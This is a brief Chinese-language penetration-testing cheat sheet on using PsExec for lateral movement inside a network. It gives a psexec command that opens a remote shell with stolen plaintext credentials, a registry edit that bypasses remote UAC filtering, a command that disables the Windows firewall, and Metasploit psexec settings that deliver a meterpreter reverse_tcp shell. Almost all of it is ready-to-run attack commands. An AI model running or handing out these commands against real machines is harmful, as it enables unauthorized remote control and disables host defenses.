psexec

psexec是一款经典的、易用的、功能强大的远程命令执行的工具，在内网渗透中灵活使用，会给内网渗透带来更多可能性

cmd执行

• 先确定目标系统是x86还是x64

• 然后使用相应的psexec的可执行文件

• 通过psexec打开远程cmd

psexec.exe \\目标内网IP -u 目标机器的用户名 -p 用户名对应的明文密码 "cmd.exe"

如果出现访问被拒绝，则修改注册表：

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

如果ping都不通，可以关闭防火墙之后再尝试：

netsh advfirewall set allprofiles state off

msf执行

通过msf进行psexec

use exploit/windows/smb/psexec
或者
use exploit/windows/smb/psexec_psh
set SMBDOMAIN 域或者.
set SMBUSER 用户名
set SMBPASS 用户明文密码
set payload windows/meterpreter/reverse_tcp
set LHOST 目标内网IP
set LPORT 攻击机本地端口
exploit -j